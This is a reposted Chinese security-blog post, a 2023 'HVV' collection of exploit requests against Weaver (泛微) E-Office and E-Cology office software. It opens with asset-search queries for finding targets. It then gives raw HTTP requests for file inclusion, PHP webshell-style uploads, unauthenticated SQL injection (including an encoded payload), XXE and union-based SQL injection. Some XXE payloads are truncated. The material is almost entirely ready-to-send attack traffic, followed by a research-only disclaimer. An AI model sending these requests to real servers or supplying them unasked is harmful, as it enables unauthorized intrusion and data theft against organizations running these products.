2023 HVV Weaver (泛微) Collection

admin, 2023-08-30 02:59:43

Network asset mapping queries:

app="泛微-EOffice",app="泛微-E-Weaver"

title="泛微云桥e-Bridge",app="泛微-协同办公OA"

 

 

 

Weaver E-Office9 front-end file inclusion

 


http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls

 

Weaver E-Office9 file upload vulnerability



POST /Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1
Host: XXX
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

 

Weaver E-Office9 file upload vulnerability


POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: XXX
User-Agent: test
Connection: close
Content-Length: 493
Accept-Encoding: gzip
Content-Type: multipart/form-data

------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Filedata"; filename="666.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

 

Weaver OA E-Cology9 unauthenticated SQL injection vulnerability (CNVD-2023-12632)

 


POST /mobile/plugin/browser.jsp HTTP/1.1
Host: ***
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
x-forwarded-for: ***
x-originating-ip: ***
x-remote-ip: ***
x-remote-addr: ***
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

 

Weaver E-Office uploadify.php back-end file upload vulnerability

POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 259
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
Accept-Encoding: gzip

--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="2TrZmO0y0SU34qUcUGHA8EXiDgN.php"
Content-Type: image/jpeg

<?php echo "2TrZmO0y0SU34qUcUGHA8EXiDgN";unlink(__FILE__);?>

--e64bdf16c554bbc109cecef6451c26a4--

Path of the uploaded file:
/attachment/3466744850/xxx.php

Weaver E-Cology XXE vulnerability (QVD-2023-16177)

Affected versions: Weaver EC 9.x with patch version < 10.58.2; Weaver EC 8.x with patch version < 10.58.2

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: ***
Content-Type: application/xml

<M><syscode>&send;</syscode></M>

EXP1:

POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host: ****
Content-Type: application/xml

EXP2:

POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1
Host: ***
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE syscode SYSTEM "

 

Weaver ShowDocsImage SQL injection vulnerability

GET /weaver/weaver.docs.docs.ShowDocsImageServlet?docId=* HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

 

Weaver HrmCareerApplyPerView SQL injection vulnerability

GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(db_name()),db_name(1),5,6,7 HTTP/1.1
Host: 127.0.0.1:7443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

 

Weaver E-Cology (certain version) SQL injection vulnerability PoC

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
Host: xxx.xxx.xxx.xxx:port
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 189
Content-Type: text/plain
Accept-Encoding: gzip

callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrUtil
c0-methodName=ifNewsCheckOutByCurrentUser
c0-id=0
c0-param0=string:1 AND 1=1
c0-param1=string:1
batchId=0

 

Originally published on the WeChat official account 左逆安全攻防: 2023 HVV Weaver (泛微) Collection

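Disclaimer: The programs (methods) covered in this article may be offensive in nature and are provided for security research and teaching purposes only. Readers who use this information for other purposes bear all legal and joint liability; this site bears no legal or joint liability. If there is a problem, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so that the message is not blocked; contact details are on the home page).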
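  • When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work): 2023 HVV Weaver (泛微) Collection https://cn-sec.com/archives/2008260.html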